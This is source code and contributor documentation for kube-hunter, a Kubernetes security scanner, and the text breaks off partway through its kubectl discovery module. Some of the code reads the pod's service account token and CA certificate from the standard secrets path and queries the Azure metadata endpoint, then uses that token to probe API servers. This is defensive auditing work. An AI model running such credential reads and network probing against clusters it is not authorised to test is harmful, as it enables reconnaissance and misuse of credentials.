_(You can filter a parent event class, such as Service or Vulnerability, to filter all services/vulnerabilities)_
#### Options for filtering:
* Remove/Prevent an event from being published
* Altering event attributes
To prevent an event from being published, return `None` from the execute method of your filter.
To alter event attributes, return a new event based on `self.event` after your modifications; it will replace the original event before it is published.
__Make sure to return the event from the execute method, or the event will not get published__
For example, if you don't want to hunt services found on a localhost IP, you can create the following module in `kube_hunter/modules/report/`:
```python
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Service, EventFilterBase
@handler.subscribe(Service)
class LocalHostFilter(EventFilterBase):
# return None to filter out event
def execute(self):
if self.event.host == "127.0.0.1":
return None
return self.event
```
This filter will filter out any Service found on a localhost IP. Those Services will not get published to Kube-Hunter's Queue.
That means other Hunters that are subscribed to this Service will not get triggered.
This opens up a wide variety of possible operations: a filter can not only __filter out__ events, it can also __change event attributes__, for example:
```python
from kube_hunter.core.events import handler
from kube_hunter.core.types import InformationDisclosure
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
@handler.subscribe(Vulnerability)
class CensorInformation(EventFilterBase):
# return None to filter out event
def execute(self):
if self.event.category == InformationDisclosure:
new_event = self.event
new_event.evidence = "<classified information>"
return new_event
else:
return self.event
```
This will censor all vulnerabilities which can disclose information about a cluster.
__Note: In filters, you should not change attributes of `event.previous`. This will result in unexpected behaviour.__
## Tests
Although we haven't been rigorous about this in the past, please add tests to support your code changes. Tests are executed like this:
```bash
python runtest.py
pytest
```

kube_hunter/__init__.py Normal file

kube_hunter/__main__.py Executable file

@@ -0,0 +1,129 @@
#!/usr/bin/env python3
# flake8: noqa: E402
import logging
import threading
from kube_hunter.conf import Config, set_config
from kube_hunter.conf.parser import parse_args
from kube_hunter.conf.logging import setup_logger
from kube_hunter.plugins import initialize_plugin_manager
pm = initialize_plugin_manager()
# Using a plugin hook for adding arguments before parsing
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
config = Config(
active=args.active,
cidr=args.cidr,
include_patched_versions=args.include_patched_versions,
interface=args.interface,
log_file=args.log_file,
mapping=args.mapping,
network_timeout=args.network_timeout,
pod=args.pod,
quick=args.quick,
remote=args.remote,
statistics=args.statistics,
)
setup_logger(args.log, args.log_file)
set_config(config)
# Running all other registered plugins before execution
pm.hook.load_plugin(args=args)
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import HuntFinished, HuntStarted
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
from kube_hunter.modules.report import get_reporter, get_dispatcher
logger = logging.getLogger(__name__)
config.dispatcher = get_dispatcher(args.dispatch)
config.reporter = get_reporter(args.report)
def interactive_set_config():
"""Sets config manually, returns True for success"""
options = [
("Remote scanning", "scans one or more specific IPs or DNS names"),
("Interface scanning", "scans subnets on all local network interfaces"),
("IP range scanning", "scans a given IP range"),
]
print("Choose one of the options below:")
for i, (option, explanation) in enumerate(options):
print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
choice = input("Your choice: ")
if choice == "1":
config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
elif choice == "2":
config.interface = True
elif choice == "3":
config.cidr = (
input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
.replace(" ", "")
.split(",")
)
else:
return False
return True
def list_hunters():
print("\nPassive Hunters:\n----------------")
for hunter, docs in handler.passive_hunters.items():
name, doc = hunter.parse_docs(docs)
print(f"* {name}\n {doc}\n")
if config.active:
print("\n\nActive Hunters:\n---------------")
for hunter, docs in handler.active_hunters.items():
name, doc = hunter.parse_docs(docs)
print(f"* {name}\n {doc}\n")
hunt_started_lock = threading.Lock()
hunt_started = False
def main():
global hunt_started
scan_options = [config.pod, config.cidr, config.remote, config.interface]
try:
if args.list:
list_hunters()
return
if not any(scan_options):
if not interactive_set_config():
return
with hunt_started_lock:
hunt_started = True
handler.publish_event(HuntStarted())
if config.pod:
handler.publish_event(RunningAsPodEvent())
else:
handler.publish_event(HostScanEvent())
# Blocking to see discovery output
handler.join()
except KeyboardInterrupt:
logger.debug("Kube-Hunter stopped by user")
# happens when running a container without interactive option
except EOFError:
logger.error("\033[0;31mPlease run again with -it\033[0m")
finally:
hunt_started_lock.acquire()
if hunt_started:
hunt_started_lock.release()
handler.publish_event(HuntFinished())
handler.join()
handler.free()
logger.debug("Cleaned Queue")
else:
hunt_started_lock.release()
if __name__ == "__main__":
main()

kube_hunter/conf/__init__.py Normal file

@@ -0,0 +1,52 @@
from dataclasses import dataclass
from typing import Any, Optional
@dataclass
class Config:
"""Config is a configuration container.
It contains the following fields:
- active: Enable active hunters
- cidr: Network subnets to scan
- dispatcher: Dispatcher object
- include_patched_version: Include patches in version comparison
- interface: Interface scanning mode
- list_hunters: Print a list of existing hunters
- log_level: Log level
- log_file: Log File path
- mapping: Report only found components
- network_timeout: Timeout for network operations
- pod: From pod scanning mode
- quick: Quick scanning mode
- remote: Hosts to scan
- report: Output format
- statistics: Include hunters statistics
"""
active: bool = False
cidr: Optional[str] = None
dispatcher: Optional[Any] = None
include_patched_versions: bool = False
interface: bool = False
log_file: Optional[str] = None
mapping: bool = False
network_timeout: float = 5.0
pod: bool = False
quick: bool = False
remote: Optional[str] = None
reporter: Optional[Any] = None
statistics: bool = False
_config: Optional[Config] = None
def get_config() -> Config:
if not _config:
raise ValueError("Configuration is not initialized")
return _config
def set_config(new_config: Config) -> None:
global _config
_config = new_config
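A usage sketch for this pair of functions (the values are arbitrary): the entry point initializes the configuration once, and any module can read it back later:
```python
from kube_hunter.conf import Config, set_config, get_config

set_config(Config(active=True, network_timeout=10.0))  # once, at startup

config = get_config()  # later, anywhere in the codebase
print(config.active, config.network_timeout)
```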

kube_hunter/conf/logging.py Normal file

@@ -0,0 +1,29 @@
import logging
DEFAULT_LEVEL = logging.INFO
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
# Suppress logging from scapy
logging.getLogger("scapy.runtime").setLevel(logging.CRITICAL)
logging.getLogger("scapy.loading").setLevel(logging.CRITICAL)
def setup_logger(level_name, logfile):
# Remove any existing handlers
# Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
for h in logging.getLogger().handlers[:]:
h.close()
logging.getLogger().removeHandler(h)
if level_name.upper() == "NONE":
logging.disable(logging.CRITICAL)
else:
log_level = getattr(logging, level_name.upper(), None)
log_level = log_level if isinstance(log_level, int) else None
if logfile is None:
logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
else:
logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
if not log_level:
logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")

kube_hunter/conf/parser.py Normal file

@@ -0,0 +1,101 @@
from argparse import ArgumentParser
from kube_hunter.plugins import hookimpl
@hookimpl
def parser_add_arguments(parser):
"""
This is the default hook implementation for parse_add_argument
Contains initialization for all default arguments
"""
parser.add_argument(
"--list",
action="store_true",
help="Displays all tests in kubehunter (add --active flag to see active tests)",
)
parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")
parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
parser.add_argument(
"--include-patched-versions",
action="store_true",
help="Don't skip patched versions when scanning",
)
parser.add_argument(
"--cidr",
type=str,
help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
)
parser.add_argument(
"--mapping",
action="store_true",
help="Outputs only a mapping of the cluster's nodes",
)
parser.add_argument(
"--remote",
nargs="+",
metavar="HOST",
default=list(),
help="One or more remote ip/dns to hunt",
)
parser.add_argument("--active", action="store_true", help="Enables active hunting")
parser.add_argument(
"--log",
type=str,
metavar="LOGLEVEL",
default="INFO",
help="Set log level, options are: debug, info, warn, none",
)
parser.add_argument(
"--log-file",
type=str,
default=None,
help="Path to a log file to output all logs to",
)
parser.add_argument(
"--report",
type=str,
default="plain",
help="Set report type, options are: plain, yaml, json",
)
parser.add_argument(
"--dispatch",
type=str,
default="stdout",
help="Where to send the report to, options are: "
"stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
"KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
)
parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")
parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
def parse_args(add_args_hook):
"""
Function handles all argument parsing
@param add_args_hook: hook for adding arguments to its given ArgumentParser parameter
@return: parsed arguments dict
"""
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
# adding all arguments to the parser
add_args_hook(parser=parser)
args = parser.parse_args()
if args.cidr:
args.cidr = args.cidr.replace(" ", "").split(",")
return args
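To illustrate the hook mechanism (bypassing the pluggy plugin manager for brevity, and with a made-up extra flag), a caller can extend the default arguments before parsing:
```python
from kube_hunter.conf.parser import parse_args, parser_add_arguments

def add_arguments(parser):
    parser_add_arguments(parser)  # register the default arguments first
    parser.add_argument("--my-extra-flag", action="store_true", help="hypothetical plugin flag")

args = parse_args(add_args_hook=add_arguments)
```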

kube_hunter/core/__init__.py

@@ -1,2 +1,3 @@
# flake8: noqa: E402
from . import types
from . import events

kube_hunter/core/events/__init__.py Normal file

@@ -0,0 +1,3 @@
# flake8: noqa: E402
from .handler import EventQueue, handler
from . import types

kube_hunter/core/events/handler.py Normal file

@@ -0,0 +1,160 @@
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
def __init__(self, num_worker=10):
super().__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
config = get_config()
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
config = get_config()
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)

kube_hunter/core/events/types.py Normal file

@@ -0,0 +1,210 @@
import logging
import threading
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import (
InformationDisclosure,
DenialOfService,
RemoteCodeExec,
IdentityTheft,
PrivilegeEscalation,
AccessRisk,
UnauthenticatedAccess,
KubernetesCluster,
)
logger = logging.getLogger(__name__)
class EventFilterBase:
def __init__(self, event):
self.event = event
# Returns self.event by default.
# If changes have been made, should return the new, altered event.
# Return None to indicate the event should be discarded
def execute(self):
return self.event
class Event:
def __init__(self):
self.previous = None
self.hunter = None
# newest attribute gets selected first
def __getattr__(self, name):
if name == "previous":
return None
for event in self.history:
if name in event.__dict__:
return event.__dict__[name]
# Event's logical location, to be used mainly for reports.
# If the event doesn't implement it, check the previous event.
# This is because events are composed (previous -> previous ...)
# and not inherited
def location(self):
location = None
if self.previous:
location = self.previous.location()
return location
# returns the event history ordered from newest to oldest
@property
def history(self):
previous, history = self.previous, list()
while previous:
history.append(previous)
previous = previous.previous
return history
class Service:
def __init__(self, name, path="", secure=True):
self.name = name
self.secure = secure
self.path = path
self.role = "Node"
def get_name(self):
return self.name
def get_path(self):
return "/" + self.path if self.path else ""
def explain(self):
return self.__doc__
class Vulnerability:
severity = dict(
{
InformationDisclosure: "medium",
DenialOfService: "medium",
RemoteCodeExec: "high",
IdentityTheft: "high",
PrivilegeEscalation: "high",
AccessRisk: "low",
UnauthenticatedAccess: "low",
}
)
# TODO: make vid mandatory once migration is done
def __init__(self, component, name, category=None, vid="None"):
self.vid = vid
self.component = component
self.category = category
self.name = name
self.evidence = ""
self.role = "Node"
def get_vid(self):
return self.vid
def get_category(self):
if self.category:
return self.category.name
def get_name(self):
return self.name
def explain(self):
return self.__doc__
def get_severity(self):
return self.severity.get(self.category, "low")
event_id_count_lock = threading.Lock()
event_id_count = 0
class NewHostEvent(Event):
def __init__(self, host, cloud=None):
global event_id_count
self.host = host
self.cloud_type = cloud
with event_id_count_lock:
self.event_id = event_id_count
event_id_count += 1
@property
def cloud(self):
if not self.cloud_type:
self.cloud_type = self.get_cloud()
return self.cloud_type
def get_cloud(self):
config = get_config()
try:
logger.debug("Checking whether the cluster is deployed on azure's cloud")
# Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
result = requests.get(
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
timeout=config.network_timeout,
).json()
return result["cloud"] or "NoCloud"
except requests.ConnectionError:
logger.info("Failed to connect cloud type service", exc_info=True)
except Exception:
logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
return "NoCloud"
def __str__(self):
return str(self.host)
# Event's logical location to be used mainly for reports.
def location(self):
return str(self.host)
class OpenPortEvent(Event):
def __init__(self, port):
self.port = port
def __str__(self):
return str(self.port)
# Event's logical location to be used mainly for reports.
def location(self):
if self.host:
location = str(self.host) + ":" + str(self.port)
else:
location = str(self.port)
return location
class HuntFinished(Event):
pass
class HuntStarted(Event):
pass
class ReportDispatched(Event):
pass
class K8sVersionDisclosure(Vulnerability, Event):
"""The kubernetes version could be obtained from the {} endpoint """
def __init__(self, version, from_endpoint, extra_info=""):
Vulnerability.__init__(
self,
KubernetesCluster,
"K8s Version Disclosure",
category=InformationDisclosure,
vid="KHV002",
)
self.version = version
self.from_endpoint = from_endpoint
self.extra_info = extra_info
self.evidence = version
def explain(self):
return self.__doc__.format(self.from_endpoint) + self.extra_info

kube_hunter/core/types.py Normal file

@@ -0,0 +1,88 @@
class HunterBase:
publishedVulnerabilities = 0
@staticmethod
def parse_docs(docs):
"""returns tuple of (name, docs)"""
if not docs:
return __name__, "<no documentation>"
docs = docs.strip().split("\n")
for i, line in enumerate(docs):
docs[i] = line.strip()
return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>"
@classmethod
def get_name(cls):
name, _ = cls.parse_docs(cls.__doc__)
return name
def publish_event(self, event):
handler.publish_event(event, caller=self)
class ActiveHunter(HunterBase):
pass
class Hunter(HunterBase):
pass
class Discovery(HunterBase):
pass
class KubernetesCluster:
"""Kubernetes Cluster"""
name = "Kubernetes Cluster"
class KubectlClient:
"""The kubectl client binary is used by the user to interact with the cluster"""
name = "Kubectl Client"
class Kubelet(KubernetesCluster):
"""The kubelet is the primary "node agent" that runs on each node"""
name = "Kubelet"
class Azure(KubernetesCluster):
"""Azure Cluster"""
name = "Azure"
class InformationDisclosure:
name = "Information Disclosure"
class RemoteCodeExec:
name = "Remote Code Execution"
class IdentityTheft:
name = "Identity Theft"
class UnauthenticatedAccess:
name = "Unauthenticated Access"
class AccessRisk:
name = "Access Risk"
class PrivilegeEscalation(KubernetesCluster):
name = "Privilege Escalation"
class DenialOfService:
name = "Denial of Service"
# import is in the bottom to break import loops
from .events import handler # noqa

kube_hunter/modules/__init__.py

@@ -1,3 +1,4 @@
# flake8: noqa: E402
from . import report
from . import discovery
from . import hunting

kube_hunter/modules/discovery/__init__.py Normal file

@@ -0,0 +1,11 @@
# flake8: noqa: E402
from . import (
apiserver,
dashboard,
etcd,
hosts,
kubectl,
kubelet,
ports,
proxy,
)

kube_hunter/modules/discovery/apiserver.py Normal file

@@ -0,0 +1,126 @@
import logging
import requests
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
from kube_hunter.conf import get_config
KNOWN_API_PORTS = [443, 6443, 8080]
logger = logging.getLogger(__name__)
class K8sApiService(Service, Event):
"""A Kubernetes API service"""
def __init__(self, protocol="https"):
Service.__init__(self, name="Unrecognized K8s API")
self.protocol = protocol
class ApiServer(Service, Event):
"""The API server is in charge of all operations on the cluster."""
def __init__(self):
Service.__init__(self, name="API Server")
self.protocol = "https"
class MetricsServer(Service, Event):
"""The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
def __init__(self):
Service.__init__(self, name="Metrics Server")
self.protocol = "https"
# Other devices could have this port open, but we can check to see if it looks like a Kubernetes api
# A Kubernetes API service will respond with a JSON message that includes a "code" field for the HTTP status code
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in KNOWN_API_PORTS)
class ApiServiceDiscovery(Discovery):
"""API Service Discovery
Checks for the existence of K8s API Services
"""
def __init__(self, event):
self.event = event
self.session = requests.Session()
self.session.verify = False
def execute(self):
logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
protocols = ["http", "https"]
for protocol in protocols:
if self.has_api_behaviour(protocol):
self.publish_event(K8sApiService(protocol))
def has_api_behaviour(self, protocol):
config = get_config()
try:
r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
return True
except requests.exceptions.SSLError:
logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
except Exception:
logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
# Acts as a filter for services. In the case that we can classify the API,
# we swap the filtered event with a new corresponding Service to be published next.
# The classification can depend on the context of the execution.
# Currently we classify: Metrics Server and Api Server
# If running as a pod:
# We know the Api server IP, so we can classify easily
# If not:
# We determine by accessing the /version on the service.
# Api Server will contain a major version field, while the Metrics will not
@handler.subscribe(K8sApiService)
class ApiServiceClassify(EventFilterBase):
"""API Service Classifier
Classifies an API service
"""
def __init__(self, event):
self.event = event
self.classified = False
self.session = requests.Session()
self.session.verify = False
# Using the auth token if we can, for the case that authentication is needed for our checks
if self.event.auth_token:
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
def classify_using_version_endpoint(self):
"""Tries to classify by accessing /version. if could not access succeded, returns"""
config = get_config()
try:
endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
versions = self.session.get(endpoint, timeout=config.network_timeout).json()
if "major" in versions:
if versions.get("major") == "":
self.event = MetricsServer()
else:
self.event = ApiServer()
except Exception:
logging.warning("Could not access /version on API service", exc_info=True)
def execute(self):
discovered_protocol = self.event.protocol
# if running as pod
if self.event.kubeservicehost:
# if the host is the api server's IP, we know it's the Api Server
if self.event.kubeservicehost == str(self.event.host):
self.event = ApiServer()
else:
self.event = MetricsServer()
# if not running as pod.
else:
self.classify_using_version_endpoint()
# in any case, making sure to link previously discovered protocol
self.event.protocol = discovered_protocol
# If some check classified the Service,
# the event will have been replaced.
return self.event

kube_hunter/modules/discovery/dashboard.py Normal file

@@ -0,0 +1,44 @@
import json
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
from kube_hunter.core.types import Discovery
logger = logging.getLogger(__name__)
class KubeDashboardEvent(Service, Event):
"""A web-based Kubernetes user interface allows easy usage with operations on the cluster"""
def __init__(self, **kargs):
Service.__init__(self, name="Kubernetes Dashboard", **kargs)
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
class KubeDashboard(Discovery):
"""K8s Dashboard Discovery
Checks for the existence of a Dashboard
"""
def __init__(self, event):
self.event = event
@property
def secure(self):
config = get_config()
endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
logger.debug("Attempting to discover an Api server to access dashboard")
try:
r = requests.get(endpoint, timeout=config.network_timeout)
if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
return False
except requests.Timeout:
logger.debug(f"failed getting {endpoint}", exc_info=True)
return True
def execute(self):
if not self.secure:
self.publish_event(KubeDashboardEvent())

kube_hunter/modules/discovery/etcd.py

@@ -1,26 +1,22 @@
import json
import logging
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
from kube_hunter.core.types import Discovery
import requests
from ...core.events import handler
from ...core.events.types import Event, OpenPortEvent, Service
from ...core.types import Hunter
# Service:
class EtcdAccessEvent(Service, Event):
"""Etcd is a DB that stores cluster's data, it contains configuration and current state information, and might contain secrets"""
"""Etcd is a DB that stores cluster's data, it contains configuration and current
state information, and might contain secrets"""
def __init__(self):
Service.__init__(self, name="Etcd")
@handler.subscribe(OpenPortEvent, predicate= lambda p: p.port == 2379)
class EtcdRemoteAccess(Hunter):
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
class EtcdRemoteAccess(Discovery):
"""Etcd service
check for the existence of etcd service
"""
def __init__(self, event):
self.event = event

kube_hunter/modules/discovery/hosts.py Normal file

@@ -0,0 +1,209 @@
import os
import logging
import itertools
import requests
from enum import Enum
from netaddr import IPNetwork, IPAddress, AddrFormatError
from netifaces import AF_INET, ifaddresses, interfaces, gateways
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability
from kube_hunter.core.types import Discovery, InformationDisclosure, Azure
logger = logging.getLogger(__name__)
class RunningAsPodEvent(Event):
def __init__(self):
self.name = "Running from within a pod"
self.auth_token = self.get_service_account_file("token")
self.client_cert = self.get_service_account_file("ca.crt")
self.namespace = self.get_service_account_file("namespace")
self.kubeservicehost = os.environ.get("KUBERNETES_SERVICE_HOST", None)
# Event's logical location to be used mainly for reports.
def location(self):
location = "Local to Pod"
hostname = os.getenv("HOSTNAME")
if hostname:
location += f" ({hostname})"
return location
def get_service_account_file(self, file):
try:
with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
return f.read()
except OSError:
pass
class AzureMetadataApi(Vulnerability, Event):
"""Access to the Azure Metadata API exposes information about the machines associated with the cluster"""
def __init__(self, cidr):
Vulnerability.__init__(
self,
Azure,
"Azure Metadata Exposure",
category=InformationDisclosure,
vid="KHV003",
)
self.cidr = cidr
self.evidence = f"cidr: {cidr}"
class HostScanEvent(Event):
def __init__(self, pod=False, active=False, predefined_hosts=None):
# flag to specify whether to get actual data from vulnerabilities
self.active = active
self.predefined_hosts = predefined_hosts or []
class HostDiscoveryHelpers:
# generator; given a subnet, yields its ips while skipping any found in the ignore list
@staticmethod
def filter_subnet(subnet, ignore=None):
for ip in subnet:
if ignore and any(ip in s for s in ignore):
logger.debug(f"HostDiscoveryHelpers.filter_subnet ignoring {ip}")
else:
yield ip
@staticmethod
def generate_hosts(cidrs):
ignore = list()
scan = list()
for cidr in cidrs:
try:
if cidr.startswith("!"):
ignore.append(IPNetwork(cidr[1:]))
else:
scan.append(IPNetwork(cidr))
except AddrFormatError as e:
raise ValueError(f"Unable to parse CIDR {cidr}") from e
return itertools.chain.from_iterable(HostDiscoveryHelpers.filter_subnet(sb, ignore=ignore) for sb in scan)
@handler.subscribe(RunningAsPodEvent)
class FromPodHostDiscovery(Discovery):
"""Host Discovery when running as pod
Generates IP addresses to scan, based on cluster/scan type
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
# Scan any hosts that the user specified
if config.remote or config.cidr:
self.publish_event(HostScanEvent())
else:
# Discover cluster subnets, we'll scan all these hosts
cloud = None
if self.is_azure_pod():
subnets, cloud = self.azure_metadata_discovery()
else:
subnets = self.gateway_discovery()
should_scan_apiserver = False
if self.event.kubeservicehost:
should_scan_apiserver = True
for ip, mask in subnets:
if self.event.kubeservicehost and self.event.kubeservicehost in IPNetwork(f"{ip}/{mask}"):
should_scan_apiserver = False
logger.debug(f"From pod scanning subnet {ip}/{mask}")
for ip in IPNetwork(f"{ip}/{mask}"):
self.publish_event(NewHostEvent(host=ip, cloud=cloud))
if should_scan_apiserver:
self.publish_event(NewHostEvent(host=IPAddress(self.event.kubeservicehost), cloud=cloud))
def is_azure_pod(self):
config = get_config()
try:
logger.debug("From pod attempting to access Azure Metadata API")
if (
requests.get(
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
headers={"Metadata": "true"},
timeout=config.network_timeout,
).status_code
== 200
):
return True
except requests.exceptions.ConnectionError:
logger.debug("Failed to connect Azure metadata server")
return False
# for pod scanning
def gateway_discovery(self):
""" Retrieving default gateway of pod, which is usually also a contact point with the host """
return [[gateways()["default"][AF_INET][0], "24"]]
# querying azure's interface metadata api | works only from a pod
def azure_metadata_discovery(self):
config = get_config()
logger.debug("From pod attempting to access azure's metadata")
machine_metadata = requests.get(
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
headers={"Metadata": "true"},
timeout=config.network_timeout,
).json()
address, subnet = "", ""
subnets = list()
for interface in machine_metadata["network"]["interface"]:
address, subnet = (
interface["ipv4"]["subnet"][0]["address"],
interface["ipv4"]["subnet"][0]["prefix"],
)
subnet = subnet if not config.quick else "24"
logger.debug(f"From pod discovered subnet {address}/{subnet}")
subnets.append([address, subnet if not config.quick else "24"])
self.publish_event(AzureMetadataApi(cidr=f"{address}/{subnet}"))
return subnets, "Azure"
@handler.subscribe(HostScanEvent)
class HostDiscovery(Discovery):
"""Host Discovery
Generates IP addresses to scan, based on cluster/scan type
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
if config.cidr:
for ip in HostDiscoveryHelpers.generate_hosts(config.cidr):
self.publish_event(NewHostEvent(host=ip))
elif config.interface:
self.scan_interfaces()
elif len(config.remote) > 0:
for host in config.remote:
self.publish_event(NewHostEvent(host=host))
# for normal scanning
def scan_interfaces(self):
for ip in self.generate_interfaces_subnet():
handler.publish_event(NewHostEvent(host=ip))
# generate all subnets from all internal network interfaces
def generate_interfaces_subnet(self, sn="24"):
for ifaceName in interfaces():
for ip in [i["addr"] for i in ifaddresses(ifaceName).setdefault(AF_INET, [])]:
if not self.event.localhost and InterfaceTypes.LOCALHOST.value in ip.__str__():
continue
for ip in IPNetwork(f"{ip}/{sn}"):
yield ip
# for comparing prefixes
class InterfaceTypes(Enum):
LOCALHOST = "127"
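As a small usage sketch of the `!` exclusion syntax that `generate_hosts` implements (addresses are arbitrary):
```python
from kube_hunter.modules.discovery.hosts import HostDiscoveryHelpers

# scan 192.168.0.0/30, but skip 192.168.0.2
hosts = HostDiscoveryHelpers.generate_hosts(["192.168.0.0/30", "!192.168.0.2/32"])
print([str(ip) for ip in hosts])  # 192.168.0.2 is filtered out
```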

kube_hunter/modules/discovery/kubectl.py Normal file

@@ -0,0 +1,49 @@
import logging
import subprocess
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import HuntStarted, Event
logger = logging.getLogger(__name__)
class KubectlClientEvent(Event):
"""The API server is in charge of all operations on the cluster."""
def __init__(self, version):
self.version = version
def location(self):
return "local machine"
# Will be triggered on start of every hunt
@handler.subscribe(HuntStarted)
class KubectlClientDiscovery(Discovery):
"""Kubectl Client Discovery
Checks for the existence of a local kubectl client
"""
def __init__(self, event):
self.event = event
def get_kubectl_binary_version(self):
version = None
try:
# kubectl version --client does not make any connection to the cluster/internet whatsoever.
version_info = subprocess.check_output("kubectl version --client", stderr=subprocess.STDOUT)
if b"GitVersion" in version_info:
# extracting version from kubectl output
version_info = version_info.decode()
start = version_info.find("GitVersion")
